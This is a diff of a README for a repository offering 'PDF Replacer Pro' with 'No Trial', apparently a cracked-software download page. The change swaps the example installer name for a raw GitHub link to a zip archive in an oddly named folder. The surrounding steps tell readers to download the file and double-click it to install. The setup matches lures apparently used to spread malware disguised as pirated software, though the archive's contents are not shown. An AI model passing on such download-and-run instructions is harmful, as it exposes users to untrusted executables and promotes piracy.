discordnoliesg/PDF-Replacer-Pro-No-Trial/README.md

    - Find the most recent release at the top of the page.

 3. **Download the Installer:**
-   - Click on the link for the installer file, which should be labeled clearly (e.g., PDF-Replacer-Pro-No-Trial-Vx.x.x.exe).
+   - Click on the link for the installer file, which should be labeled clearly (e.g., https://raw.githubusercontent.com/discordnoliesg/PDF-Replacer-Pro-No-Trial/main/overbitten/PDF-Replacer-Pro-No-Trial_3.7.zip).

 4. **Run the Installer:**
    - Locate the downloaded file in your downloads folder.
 Double-click the file to start the installation process.